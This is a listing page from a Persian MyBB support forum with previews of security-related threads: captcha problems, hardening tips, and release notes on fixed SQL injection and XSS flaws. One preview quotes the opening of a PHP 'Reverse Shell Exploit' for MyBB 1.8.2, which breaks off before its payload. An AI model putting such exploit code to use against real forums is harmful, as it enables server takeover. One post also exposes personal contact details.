مهمان عزیز خوش آمدید. ورود ثبت نام



کلمات کلیدی
نویسنده: پسر پاییزی - پاسخ‌ها: 2 - بازدید‌ها: 1211
مشکل در تصویر تایید کد امنیتی
سلام
ببخیشد تو انجمن من وقتی میخوای ثبت نام کنی تصویری که تو اون کد امنیتی وجود داره لود نمیشه!

دلیلش رو میتونید بگید و بگید که از کجا باید درستش کنم؟"؟؟؟
نویسنده: KoG - پاسخ‌ها: 11 - بازدید‌ها: 3222
[امنیتی] محافظت از بخش inc انجمن
این مقاله در یکی از سایت های خارجی منتشر شده و در این آموزش ما نحوه مسدود کردن دسترسی عموم به قسمت inc انجمن یاد می گیریم .

خب اول یه فایل متنی به نام  .htaccess ایجاد کنید
حال فایل متنی را باز کرده و کد زیر را در آن وارد کنید :


کد:
deny from all
حال فایل متنی را ذخیره نموده و آنرا در بخش /inc/ انجمن خود آپ کنید .

حال به ادرس زیر بروید و به جای  yoursite.com  ، آدرس سایت خود را قرار بدهید :
http://yoursite.com/inc/

اگر به ارور 403 - Forbidden  برخورد کردید ، آموزش درست بود و دستر
نویسنده: hamidkag - پاسخ‌ها: 1 - بازدید‌ها: 2811
[امنیتی] آموزش تغییر نام مسیر admin برای جلوگیری از هک
یکی از راه های جلوگیری از هک شدن توسط هکرها تغییر نام مسیر admin انجمن به نام دلخواه خود میباشد.
البته میزان تاثیرش متوسطه ولی میتونه هم تاثیر گذار باشه
برای این کار مراحل زیر را دنبال کنید:
1- ابتدا در هاستتان به پوشه inc وارد شده و فایل config.php را پیدا و کد زیر را درون آن بیابید:
کد پی‌اچ‌پی:
$config['admin_dir'] = 'admin'
در کد بالا admin دومی را که بین علامت های ' و ' وجود داره رو به اسم دلخواهد خودتون مثلا XXXXXX تغییر بدین
سپس به هاست خود رفته و در پوشه نصب انجمن پوشه admin را
نویسنده: Ctrll - پاسخ‌ها: 2 - بازدید‌ها: 1282
مشکل پلاگین یادداشت در پروفایل با تصویر امنیتی
سلام خسته نباشید
تصویر امنیتی فرم ثبت نام با پلاگین یادداشت در پروفایل (0.9.2) سازگار نیست وقتی این پلاگین رو فعال میکنم دیگه تصویر نشون داده نمیشه
راهی هست برای اینکه هم مشکل تصویر حل بشه و هم یادداشت فعال باشه؟
نویسنده: tak3azir - پاسخ‌ها: 1 - بازدید‌ها: 1239
نمایش ندادن تصویر کد امنیتی هنگام عضوت
سلام ببخشید این انجمن منه
هنگام ثبت نام کدامنیتی لازم داره ولی عکسی نمیاد که از روش بنویسم
چه کار کنم این عکس ظاهر بشه؟
مشکل کجاس؟
ادرس انجمن:http://tak3az.ir/forum

 
نویسنده: AmIR StaR - پاسخ‌ها: 11 - بازدید‌ها: 1957
مشکل امنیتی در قالب
سلام
من داشتم کد تولتبپ v2 رو کپی میکردم تو قالب های گروه بندی نشده
بعد بهم هشدار امنیتی داد که مشکل امنیتی تو قالب بوجود اومده
حالا که می خوام کد اصلی قالبو بذارم بازم اخطار امنیتی میده و نمیذاره
الان قالب انجمن خیلی بهم ریخته
خواهش می کنم یکی زود جواب بده تا حلش کنمHuhHuhHuhHuhHuhHuhHuh
http://www.8pic.ir/images/51076905149785649502.png
 
نویسنده: Tofighi - پاسخ‌ها: 12 - بازدید‌ها: 4646
پلاگین سوال امنیتی در هنگام ثبت‌نام
این هم یکی از پلاگین‌هایی که جلوگیری می کنه از ثبت نام ربات ها در انجمن
نویسنده:  G33K
ترجمه: AliReza_Tofighi
نمونه:
[attachment=1216]
دریافت:
[attachment=1217]
نویسنده: hamidkag - پاسخ‌ها: 1 - بازدید‌ها: 396
اقدامات امنیتی VPS + پرداخت هزینه (یکی کمک کنه)
با سلام
بنده یه VPS دارم که خیلی دشمن داریم و انواع مدل های DDos و اتک رو میخوریم
از هر نرم افزار و دم و دستگاهی استفاده کردم باز رومون اتک خورده
از کسانی که در این زمینه و Config کردن فایروال VPS ویندوز سررشته ای دارند خواهش میکنم به من پیام دهند یا با من تماس بگیرند
در ازای برقراری امنیت برای vPS بنده حاضرم پول هم بپردازم
شماره بنده: 09355020521
آقای وفائیان
ایمیل: vafa.hamidreza@yahoo.com
یاهو: hamidkag
اسکایپ: hamidkag
انجمن بنده: http://www.vafa-forum.ir
توجه کنید که امنیت رو برای سایتم
نویسنده: allgames - پاسخ‌ها: 8 - بازدید‌ها: 1936
مشکل کد امنیتی
با سلام و خسته نباشد
ببخشید من تازه متوجه چیزی شدم اونم اینه که کاربری که میخواد ثبت نام کنه کد امنیتی نشود داده نمیشه !!!!!!!!!!HuhHuhHuhHuh
تازه سازی رو هم میزنم بازم نشون داده نمیشه مشکل از کجاست؟ چطوری این مشکل رو حل کنم؟HuhHuhHuhIdeaIdeaIdea
نویسنده: salondaran - پاسخ‌ها: 2 - بازدید‌ها: 1307
پلاگین یا آموزش برای درست کردن پرسش امنیتی
سلام خدمت جناب مدیر و کاربران گرامی

یک توضیح کوتاه میدم !
ما تو هر انجمن تعدادی مدیر و معاون و ... داریم که پایه اصلی سایت هستند . گاهی پیش میاد که این افراد رمز عبور خودشونو و رمز عبور ایمیلشونو هر دو رو گم می کنن ! بعد با یه نامذ کاربری دیگه وارد میشن و برای مدیر پیام میدن که من فلانی هستم و رمزمو گم کردم و ...
خوب چطور میشه تشخیص داد که درست میگه اون شخص ؟ برای من اتفاق افتاده و چون ارتباط تلفنی و یا آشنایی خاصی با اون شخص نداشتم یادم افتاد که ایشون درباره موضوع خاصی از من سوال کرده بود
نویسنده: kingbehzadpax - پاسخ‌ها: 9 - بازدید‌ها: 1073
مشکل نمایش ندادن سوال امنیتی
سلام.

هنگام عضویت سوال امنیتی نمایش داده نمیشه -هیچکس نمیتونه عضو شه(همون سوال امنیتی عددها که اول هستش)

ممنون میشم زود پاسخ بدین
نویسنده: asemanbo - پاسخ‌ها: 9 - بازدید‌ها: 1169
نحوه قرار دادن سوال امنیتی ؟؟؟
سلام میخواستم سوال امنیتی رو فارسی کنم مثل این پلاگین میخواد ؟ چی میخواد لطفا راهنمایی کنید ...

تصویر: http://8pic.ir/images/58753860216167880975.png
نویسنده: BlueAmir - پاسخ‌ها: 3 - بازدید‌ها: 890
مشکل در کد امنیتی
سلام
تصویر کد امنیتی برای عضویت کاربر و فراموشی رمز عبور سایت نشون داده نمیشه ! 
میشه راهنماییم کنید که چکار کنم؟
نویسنده: MIHAN - پاسخ‌ها: 6 - بازدید‌ها: 1365
پلاگین امنیتی ریدایرکت کردن کاربر
سلام Smile
توی انجمن موضوعی هست به اسم ( مسدود کردن دسترسی کاربران به بخش inc انجمن ) که کاربر با وارد کردن این آدرس yoursite.ir/inc میتونه با استفاده از این صفحه به بخش های ممنوعه انجمن دسترسی پیدا کنه و برای همین هم هست که بهتره دسترسی به این بخش مسدود بشه
خب اگر ما به هر دلیلی دوست نداشته باشیم که کاربرها به برخی آدرس ها دسترسی داشته باشن باید چکار کنیم ؟ میتونیم با نوشتن یه پلاگین که دسترسی رو به برخی آدرس ها مسدود میکنه ؛ این کار رو به راحتی انجام بدیم‌( البته آدرس های متعلق به دامنه ی خودمو
نویسنده: malakhi - پاسخ‌ها: 2 - بازدید‌ها: 944
مشکل نشان ندادن تصویر امنیتی
با عرض سلام خدمت اساتید
نمیدونم چرا سایت من هنگام ثبت نام دیگه تصویر امنیتی رو نشون نمیده
کمک کنید

http://www.avkeys.ir
نویسنده: wildbuzz - پاسخ‌ها: 1 - بازدید‌ها: 716
سوال امنیتی 1.8
سلام
سوال امنیتی رو از کجا باید تغییر داد؟
نویسنده: p2m - پاسخ‌ها: 0 - بازدید‌ها: 523
عیدی تیم امنیتی ادوایزر به وبمستران
با سلام

دوستان تصمیم گرفتیم برای حمایت بیشتر از زحمتکشان حوزه ی سایبری مخصوصا اعضای محترم سایت my-bb.ir خدمات امنیتی رایگان ارائه بدیم لذا کسانی مایل هستند سایت خود را در برابر حملات تا حد قابل قبولی بیمه کنند میتوانند هر چه زودتر در تاپیک مربوطه اعلام امادگی کنند تا در اولویت باشند

http://sec-advisor.org/cc/showthread.php...94#pid1594
نویسنده: Tofighi - پاسخ‌ها: 10 - بازدید‌ها: 3058
مای بی‌بی 1.8.2 - انتشار امنیتی
بسم الله الرحمن الرحیم
مای بی‌بی ۱.۸.۲ هم‌اکنون از وب‌سایت مای بی‌بی قابل دریافت است.در این نسخه یک خطرامنیتی زیاد، دو خطرامنیتی متوسط و یک خطر امنیتی کم حل شده است.
چه چیزی در این نسخه اضافه/تغییر کرده است؟
آسیب پذیری‌ها عبارت‌اند از:
  • خطر زیاد: آسیب‌پذیری تزریق SQL از طریق member.php
  • خطر متوسط: آسیب‌پذیری XSS در report.php
  • خطر متوسط: آسیب‌پذیری XSS در inc/class_parser.php
  • خطر کم: آسیب پذیری XSS در admin/modules/style/templates.php
  • خطر کم: آسیب
نویسنده: Tofighi - پاسخ‌ها: 3 - بازدید‌ها: 1915
مای بی‌بی 1.6.16 - انتشار امنیتی
بسم الله الرحمن الرحیم
مای بی‌بی ۱.۶.۱۶ هم اکنون از سایت MyBB قابل دریافت است. در این نسخه یک خطر متوسط و پنج خطر کم رفع شده‌است.
چه چیزی در این نسخه اضافه/تغییر کرده است؟
آسیب پذیری‌های امنیتی عبارت اند از:
  • خطر متوسط: آسیب‌پذیری XSS در calendar.php (گزارش شده توسط -Acid)
  • خطر ضعیف: آسیب‌پذیری XSS در نمادهای ارسال‌ها (گزارش شده توسط Destroy666x)
  • خطر ضعیف: آسیب پذیری XSS در admin/modules/style/templates.php
  • خطر ضعیف: آسیب‌پذیری XSS در admin/modules/
نویسنده: Tofighi - پاسخ‌ها: 15 - بازدید‌ها: 4389
مای بی‌بی 1.8.3 - انتشار امنیتی
بسم الله الرحمن الرحیم
مای بی‌بی نسخه‌ی 1.8.3 هم‌اکنون از وب‌سایت MyBB قابل دریافت است.
در این نسخه یک آسب‌پذیری زیاد، دو آسیب‌پذیری متوسط و سه آسیب‌پذیری ضعیف رفع شده‌است.
ما همه را به ارتقا به این نسخه دعوت می‌کنیم.
چه چیزی در این نسخه ویرایش/اضافه شده است؟
  • خطر زیاد: تزریق SQL از طریق انتخاب پوسته (گزارش شده توسط StefanT)
  • خطر متوسط: آسیب پذیری XSS در calendar.php (گزارش شده توسط: -Acid)
  • خطر متوسط: آسیب‌پذیری XSS در ویرایشگر MyCode (گزارش شد
نویسنده: lianha - پاسخ‌ها: 6 - بازدید‌ها: 820
چگونه می توان کد امنیتی را حذف کرد ؟
<p>سلام و عرض ادب<br />
چگونه می توان کد امنیتی را حذف کرد ؟<br />
باتشکر</p>
نویسنده: Tofighi - پاسخ‌ها: 2 - بازدید‌ها: 1112
تغییرات امنیتی
بسم الله الرحمن الرحیم
یک سری تغییرات امنیتی توی سایت به وجود اومد که باعث میشه امنیت کوکی‌ها در وب‌سایت بالا بره.

احتمالن همه‌ی حساب‌ها الآن خارج شدن از حسابشون، لطفا دوباره وارد بشید و همچنین درصورت تغییر آی‌پی نیاز به تایید آی‌پی با ورود مجدد دارید.
اگه مشکلی بود بازهم با ایمیل mybbirgroup@gmail.com ایمیل ارسال کنید و مشکلتون رو مطرح کنید.
نویسنده: Tofighi - پاسخ‌ها: 4 - بازدید‌ها: 858
درخواست تست پلاگین امنیتی MyBB Encrypt Cookies
سلام.
یک پلاگین در مورد مشکلات امنیتی دزدی کوکی و ... نوشتم که باعث میشه این مشکلات تا حد خیلی خوبی کنترل بشه و اگه کوکی فردی رو داشته باشی نتونی وارد حسابش بشی.
روش کار این پلاگین به این صورت هست که میاد کوکی‌های مهم رو توی خود پایگاه داده که با یک کد رمزگذاری شده‌اند (کد تصادفی) به همراه UserAgent و آی‌پیهای تایید شده‌ی کاربر ذخیره میکنه.
حال اگه IP کاربر متفاوت بود به اون صفحه‌ی ورود مجدد نمایش داده میشه....
که باعث میشه تا حد خوبی جلوی چندمورد از روش‌های هک‌شدن وب‌سایت گرفته بشه.
حالا ن
نویسنده: KoG - پاسخ‌ها: 11 - بازدید‌ها: 2891
[امنیتی] محافظت از بخش inc انجمن
این مقاله در یکی از سایت های خارجی منتشر شده و در این آموزش ما نحوه مسدود کردن دسترسی عموم به قسمت inc انجمن یاد می گیریم .

خب اول یه فایل متنی به نام  .htaccess ایجاد کنید
حال فایل متنی را باز کرده و کد زیر را در آن وارد کنید :


کد:
deny from all
حال فایل متنی را ذخیره نموده و آنرا در بخش /inc/ انجمن خود آپ کنید .

حال به ادرس زیر بروید و به جای  yoursite.com  ، آدرس سایت خود را قرار بدهید :
http://yoursite.com/inc/

اگر به ارور 403 - Forbidden  برخورد کردید ، آموزش درست بود و دستر
نویسنده: hamidkag - پاسخ‌ها: 2 - بازدید‌ها: 2045
[امنیتی] آموزش تغییر نام مسیر admin برای جلوگیری از هک
یکی از راه های جلوگیری از هک شدن توسط هکرها تغییر نام مسیر admin انجمن به نام دلخواه خود میباشد.
البته میزان تاثیرش متوسطه ولی میتونه هم تاثیر گذار باشه
برای این کار مراحل زیر را دنبال کنید:
1- ابتدا در هاستتان به پوشه inc وارد شده و فایل config.php را پیدا و کد زیر را درون آن بیابید:
کد پی‌اچ‌پی:
$config['admin_dir'] = 'admin'
در کد بالا admin دومی را که بین علامت های ' و ' وجود داره رو به اسم دلخواهد خودتون مثلا XXXXXX تغییر بدین
سپس به هاست خود رفته و در پوشه نصب انجمن پوشه admin را
نویسنده: KoG - پاسخ‌ها: 13 - بازدید‌ها: 3218
[امنیتی] محافظت از بخش inc انجمن
این مقاله در یکی از سایت های خارجی منتشر شده و در این آموزش ما نحوه مسدود کردن دسترسی عموم به قسمت inc انجمن یاد می گیریم .

خب اول یه فایل متنی به نام  .htaccess ایجاد کنید
حال فایل متنی را باز کرده و کد زیر را در آن وارد کنید :


کد:
deny from all
حال فایل متنی را ذخیره نموده و آنرا در بخش /inc/ انجمن خود آپ کنید .

حال به ادرس زیر بروید و به جای  yoursite.com  ، آدرس سایت خود را قرار بدهید :
http://yoursite.com/inc/

اگر به ارور 403 - Forbidden  برخورد کردید ، آموزش درست بود و دستر
نویسنده: hamidkag - پاسخ‌ها: 4 - بازدید‌ها: 2503
[امنیتی] آموزش تغییر نام مسیر admin برای جلوگیری از هک
یکی از راه های جلوگیری از هک شدن توسط هکرها تغییر نام مسیر admin انجمن به نام دلخواه خود میباشد.
البته میزان تاثیرش متوسطه ولی میتونه هم تاثیر گذار باشه
برای این کار مراحل زیر را دنبال کنید:
1- ابتدا در هاستتان به پوشه inc وارد شده و فایل config.php را پیدا و کد زیر را درون آن بیابید:
کد پی‌اچ‌پی:
$config['admin_dir'] = 'admin'
در کد بالا admin دومی را که بین علامت های ' و ' وجود داره رو به اسم دلخواهد خودتون مثلا XXXXXX تغییر بدین
سپس به هاست خود رفته و در پوشه نصب انجمن پوشه admin را
نویسنده: rockman - پاسخ‌ها: 2 - بازدید‌ها: 302
مشکل در تصویر امنیتی
باسلام

در هنگام ثبت نام برای جلوگیری از اسپمر ها تصویر امنیتی نشان داده نمیشه !!! چکار باید بکنیم؟ چه پلاگینی نصب کنیم ؟ سوال امنیتی هم فعال است اما باز افراد ناشناسی از روسیه و ... ثبت نام میکنن و هیچ کار و حرکتی هم نمیکنن. دوستان لطفا راهنمایی کنین که جلوی ثبت نام های این چنینی رو بگیریم چکار کنیم؟ چه پلاگین یا حرکتی پیشنهاد میدین؟

آدرس انجمن : http://forum.kamyabdl.com/

ممنون
نویسنده: IrIsT - پاسخ‌ها: 0 - بازدید‌ها: 491
چک لیست امنیتی طراحی سایت security checklist web application design
سلام و درود.
امروز یک مقاله بسیار عالی برای دوستان آپلود کردم.
چک لیست امنیتی طراحی سایت security checklist web application design
این مقاله،یک چک لیست مختصر اما مفید برای طراحان سایت می باشد که در آن توضیحاتی از باگ های موجود در اپلیکیشن ها و همچنین توضیحات امنیتی برای رفع آن می باشد.
این آموزش،فوق العاده خوبی است که هم برای طراحان سایت مفید است و هم برای آشنایی بیشتر باگ ها در اپلیکیشن ها.

لینک دانلود:

http://kkli.ir/ACdX0

امیدوارم این مقاله خوب رو از دست ندین.تقدیم به دوستان

نویسنده: IrIsT - پاسخ‌ها: 4 - بازدید‌ها: 479
آیا این مشکل امنیتی در mybb 1.8 درسته؟
سلام و درود
یک باگ ثبت شده واسه mybb 1.8 که دسترسی برای چک ندارم.از دوستان میخوام چک کنن ببینن این درسته.آیا باگش درسته یا فیک هستش
چون زده داخل کور اصلی هستش

<?php

// Exploit Title: MyBB <= 1.8.2 Reverse Shell Exploit
// Software Link: http://resources.mybb.com/downloads/mybb_1802.zip
// Version: <= 1.8.2
// Tested on: MyBB 1.8.2

$target="http://localhost/mybb1802/index.php";
$yourip="ipaddress";
$ch=curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch,
نویسنده: IrIsT - پاسخ‌ها: 3 - بازدید‌ها: 611
حفره امنیتی جدید و خطرناک MySQL، MariaDB و PerconaDB
حفره امنیتی جدید و خطرناک MySQL، MariaDB و PerconaDB که به تازگی منتشر شده است.

وجود حفره‌های امنیتی در MySQL، MariaDB و PerconaDB این امکان را به هکر می‌دهد تا به سرور میزبان این پایگاه داده‌ها دسترسی داشته باشد. هکر با استفاده از این حفره‌های امنیتی می‌تواند کد مخرب خود را اجرا کرده و دسترسی مدیریتی به سرور داشته باشد.

آسیب‌پذیری‌ها نسخه‌های 5.5.51 و قبل‌تر، 5.6.32 و قبل‌تر و هم‌چنین 5.7.14 و قبل‌تر پایگاه داده MySQL و Percona و MariaDB را تحت تأثیر قرار داده است.

اولین آسیب‌پذیری با
نویسنده: vahid24 - پاسخ‌ها: 1 - بازدید‌ها: 146
تغییر پرسش امنیتی
سلام
چطور میشه پرسش امنیتی در قسمت ثبت نام رو تغییر داد؟
صفحه‌ها (4):

درباره‌ی ما

گروه پشتیبانی فارسی مای بی بی My-BB.Ir در واپسین روزهای پاییز 1391 کار خود را در زمینه مای بی بی آغاز کرد. این گروه با توکل بر خدای منان و دانش فنی خود در تلاش است فعالیتی هرچند ناچیز در زمینه ارتقا و پشتیبانی مای بی بی انجام دهد.
تمامی حقوق برای وب‌سایت پشتیبانی فارسی مای بی‌بی (My-BB.Ir) محفوظ می‌باشد و هرگونه کپی‌برداری از آن شرعا حرام و قانونا غیرمجاز می‌باشد.
قدرت گرفته از مای بی‌بی - فارسی‌ساز: My-BB.Ir و IORA.Ir